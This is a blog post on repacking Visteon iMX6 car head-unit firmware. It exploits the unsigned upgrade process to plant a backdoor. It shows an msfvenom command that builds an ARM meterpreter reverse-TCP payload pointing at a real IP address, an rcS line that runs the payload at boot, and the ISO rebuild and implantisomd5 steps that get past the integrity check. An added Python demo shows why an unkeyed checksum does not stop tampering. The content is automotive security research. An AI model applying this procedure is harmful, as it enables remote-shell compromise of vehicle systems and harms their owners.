Visteon Firmware Repacking

Friday, November 30, 2018

Preface

The firmware layout is illustrated below. It is organized into three directories—APP, SOC, and MCU—which correspond roughly to the Application Layer, the Core Board, and the Base Board, respectively.

  • APP: Contains updates for navigation maps and voice-recognition libraries.
  • MCU: Contains firmware updates for the MCU, covering both the base board and the instrument cluster.
  • SOC: Contains system updates for the core board.

Additionally, version.txt is used for version validation. Reverse-engineering the upgrade utility revealed no cryptographic signature verification, yet simply modifying the ISO caused the upgrade to fail, which is what prompted this investigation.

(figure: file_tree)

Upgrade Process

On Visteon’s iMX6 platform, a specific “recovery partition” handles system upgrades.

First, the boot configuration is switched so that the next restart boots from partition 2. This is done by writing to the eMMC device's boot_config attribute in sysfs, which selects the boot partition:

echo 2 > /sys/devices/soc0/soc.0/2100000.aips-bus/2198000.usdhc/mmc_host/mmc2/mmc2:0001/boot_config

Upon rebooting into the recovery environment, the script formats and mounts the original system partition.

mkfs.ext3 -F /dev/mmcblk2p2
mount -t ext3 -o rw /dev/mmcblk2p2 /tmp/mmcblk2p12

Next, the ISO image is mounted:

/bin/mount -t iso9660 -o exec,loop /tmp/mnt/8644_8005_3BFD62ABB2EC3783_0/upgrade-ring.iso /tmp/isofs

Finally, the rootfs archive is extracted onto the freshly formatted partition. Nothing in this sequence checks who produced the archive, so whatever the ISO contains becomes the new system:

tar xvf /tmp/isofs/rootfs.tar -C /tmp/mmcblk2p12

Repacking rootfs

First, I generated an ARM Little Endian (ARMLE) reverse TCP payload:

$ msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=206.189.68.130 LPORT=54444 -f elf -o linux_armle.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 260 bytes
Final size of elf file: 344 bytes
Saved as: linux_armle.elf

Next, with the ELF placed at bin/linux_armle.elf inside the extracted rootfs, I appended a line to the init script so that it starts at boot:

echo "/bin/linux_armle.elf &" >> ./etc/init.d/rcS

Note: when repacking the rootfs, do not preserve file permissions (for example with tar's -p flag); on this particular system doing so led to boot failures. Run the command from inside the extracted rootfs directory (the ./* glob does not match dot-files at the top level):

tar -cf ../rootfs.tar ./*

ISO-9660

ISO 9660 is the standard file system for CD-ROM media. Joliet is an extension to ISO 9660 that relaxes some of its restrictions (such as filename length). The standard defines three interchange levels:

  • Level 1: DOS-compatible (8.3 filenames).
  • Level 2: Supports longer filenames but limits single files to 2 GB.
  • Level 3: Supports single files larger than 2 GB (up to 8 TB).

UDF

UDF (Universal Disk Format) utilizes packet writing, allowing optical media (like CD-RWs) to be treated more like hard drives. It supports files larger than 2 GB natively, but its compatibility with older systems is generally lower than that of ISO 9660.

ISO MD5

(figure: iso_hex)

To detect data corruption, the ISO carries MD5 checksums embedded in its header by implantisomd5. General-purpose tools such as UltraISO do not regenerate them when repacking, so the upgrade program's validation fails on a modified image. Note that this is an integrity check only: the checksum involves no secret, so anyone who can rebuild the image can re-implant a matching one.

First, I examined the metadata of the original ISO. The output shows an image created with genisoimage, carrying Joliet (reported as UCS level 3) and Rock Ridge extensions; the "level 3" here is the Joliet Unicode escape level, not the ISO 9660 interchange level.

$ isoinfo -d -i upgrade-ring.raw.iso
CD-ROM is in ISO 9660 format
System id: LINUX
Volume id: CDROM
Volume set id:
Publisher id:
Data preparer id:
Application id: GENISOIMAGE ISO 9660/HFS FILESYSTEM CREATOR (C) 1993 E.YOUNGDALE (C) 1997-2006 J.PEARSON/J.SCHILLING (C) 2006-2007 CDRKIT TEAM
Copyright File id:
Abstract File id:
Bibliographic File id:
Volume set size is: 1
Volume set sequence number is: 1
Logical block size is: 2048
Volume size is: 488066
Joliet with UCS level 3 found
Rock Ridge signatures version 1 found

I used mkisofs to repack the directory into an ISO image. The relevant options from mkisofs -h:

mkisofs -h
...
-J, -joliet                Generate Joliet directory information
-T, -translation-table     Generate TRANS.TBL file-name translation tables
...

The original image also carried Rock Ridge signatures; this repack omits -R, which was fine for a single rootfs.tar but would matter if the upgrade relied on POSIX names or permissions inside the ISO.

mkisofs -J -T -v -o upgrade-ring.iso iso/

After building the ISO, I used implantisomd5 to embed the MD5 checksums, which satisfied the upgrade program’s validation check.

$ implantisomd5 upgrade-ring.iso
Inserting md5sum into iso image...
md5 = e1914b1bf902a63244e3bb810823e6b2
Inserting fragment md5sums into iso image...
fragmd5 = 5126d7bcb6459898d56ca8822c5e7bdd45b15d5a9ed6c1f7351a55d18ae8
frags = 20
Setting supported flag to 0

Finally, verify the image integrity:

$ checkisomd5 upgrade-ring.iso
upgrade-ring.raw.iso:   e1914b1bf902a63244e3bb810823e6b2
Fragment sums: 5126d7bcb6459898d56ca8822c5e7bdd45b15d5a9ed6c1f7351a55d18ae8
Fragment count: 20
Supported ISO: no
Press [Esc] to abort check.
Checking: 100.0%

The media check is complete, the result is: PASS.

It is OK to use this media.
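To make the failure mode concrete, here is an added Python example (not code from the original post, and not the isomd5sum project's own code) that implants and checks a checksum record of the kind implantisomd5 writes, on a constructed stand-in image. The record layout (a text record in the 512-byte Application Use field of the primary volume descriptor at sector 16, with the MD5 taken over the image after blanking that field and dropping the last SKIPSECTORS sectors) follows my reading of the isomd5sum sources; the fragment-sum boundaries and the default of 15 skipped sectors are assumptions, so byte-for-byte agreement with the real checkisomd5 is unverified here and should be confirmed with the tool. What the example shows is the point that matters for this upgrade path: a one-bit change in the payload fails the check, re-implanting after the change passes it again, and a change inside the trailing skipped sectors is never noticed at all.

```python
import hashlib

SECTOR = 2048
PVD_SECTOR = 16           # ISO 9660 volume descriptors start at logical sector 16
APPDATA_OFFSET = 883      # Application Use field inside the PVD (512 bytes)
APPDATA_LEN = 512
SIZE_OFFSET = 84          # big-endian copy of Volume Space Size, in sectors
SKIPSECTORS = 15          # trailing sectors left out of the sum (isomd5sum default, assumed)
FRAGMENT_COUNT = 20
FRAGMENT_SUM_LENGTH = 60  # 60 chars / 20 fragments = 3 chars per fragment


def _appdata_range():
    start = PVD_SECTOR * SECTOR + APPDATA_OFFSET
    return start, start + APPDATA_LEN


def compute_sums(image, skipsectors=SKIPSECTORS):
    """MD5 of the image with the Application Use field blanked to spaces and the
    last `skipsectors` sectors excluded, plus the fragment string."""
    work = bytearray(image)
    a, b = _appdata_range()
    work[a:b] = b" " * APPDATA_LEN
    pvd = PVD_SECTOR * SECTOR
    sectors = int.from_bytes(work[pvd + SIZE_OFFSET:pvd + SIZE_OFFSET + 4], "big")
    length = (sectors - skipsectors) * SECTOR
    frag_len = length // FRAGMENT_COUNT
    per_frag = FRAGMENT_SUM_LENGTH // FRAGMENT_COUNT
    md5 = hashlib.md5()
    frags = ""
    pos = 0
    for i in range(FRAGMENT_COUNT):
        end = length if i == FRAGMENT_COUNT - 1 else (i + 1) * frag_len
        md5.update(work[pos:end])
        pos = end
        # Running digest after each fragment. isomd5sum prints each leading byte
        # with "%01x" into a 2-byte buffer, so one character survives per byte;
        # my equal-size fragment boundaries approximate its buffer-based ones.
        frags += "".join(("%01x" % byte)[0] for byte in md5.copy().digest()[:per_frag])
    return md5.hexdigest(), frags


def implant(image, supported=0):
    """Write an isomd5sum-style record into the PVD Application Use field."""
    md5hex, frags = compute_sums(image)
    record = ("ISO MD5SUM = %s;SKIPSECTORS = %d;RHLISOSTATUS=%d;FRAGMENT SUMS = %s;"
              "FRAGMENT COUNT = %d;THIS IS NOT THE SAME AS RUNNING MD5SUM ON THIS ISO!!"
              % (md5hex, SKIPSECTORS, supported, frags, FRAGMENT_COUNT)).encode("ascii")
    work = bytearray(image)
    a, b = _appdata_range()
    work[a:b] = record.ljust(APPDATA_LEN, b" ")
    return bytes(work)


def parse_record(image):
    """Split the ';'-separated record back into a dict (empty if none is present)."""
    a, b = _appdata_range()
    fields = {}
    for item in image[a:b].decode("ascii", "replace").split(";"):
        if " = " in item:
            key, value = item.split(" = ", 1)
            fields[key.strip()] = value.strip()
        elif item.startswith("RHLISOSTATUS="):
            fields["RHLISOSTATUS"] = item[len("RHLISOSTATUS="):]
    return fields


def check(image):
    """The question checkisomd5 (and the upgrade utility) effectively ask: do the
    recomputed sums match the embedded ones? No key is involved, so a pass says
    nothing about who built the image."""
    fields = parse_record(image)
    if "ISO MD5SUM" not in fields or "SKIPSECTORS" not in fields:
        return False
    md5hex, frags = compute_sums(image, int(fields["SKIPSECTORS"]))
    return fields["ISO MD5SUM"] == md5hex and fields.get("FRAGMENT SUMS") == frags


def make_test_image(payload_sectors=64):
    """Constructed stand-in for upgrade-ring.iso: 16 system sectors, a minimal
    PVD, a terminator descriptor and a byte-pattern payload. Not a mountable ISO."""
    total = PVD_SECTOR + 2 + payload_sectors
    img = bytearray(total * SECTOR)
    pvd = PVD_SECTOR * SECTOR
    img[pvd] = 1                                   # type 1: primary volume descriptor
    img[pvd + 1:pvd + 6] = b"CD001"
    img[pvd + 80:pvd + 84] = total.to_bytes(4, "little")
    img[pvd + 84:pvd + 88] = total.to_bytes(4, "big")
    img[pvd + SECTOR] = 255                        # volume descriptor set terminator
    img[pvd + SECTOR + 1:pvd + SECTOR + 6] = b"CD001"
    start = (PVD_SECTOR + 2) * SECTOR
    img[start:] = bytes((i * 7) & 0xFF for i in range(payload_sectors * SECTOR))
    return bytes(img)


def demo():
    original = implant(make_test_image())
    tampered = bytearray(original)
    tampered[(PVD_SECTOR + 5) * SECTOR] ^= 0x01    # one bit inside the summed payload
    tail = bytearray(original)
    tail[-1] ^= 0xFF                               # inside the skipped trailing sectors
    return {
        "original_passes": check(original),
        "tampered_passes": check(bytes(tampered)),
        "reimplanted_passes": check(implant(bytes(tampered))),
        "tail_edit_passes": check(bytes(tail)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-20s %s" % (name, "PASS" if result else "FAIL"))
```

Running the block prints PASS for the original, FAIL for the one-bit edit, PASS again once the edited image is re-implanted, and PASS for the edit in the trailing sectors. The lesson for the upgrade utility is the same as for any unkeyed checksum: it catches a scratched disc or a truncated download, and nothing else.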
Tags: Automotive Security, Visteon, iMX6, ISO
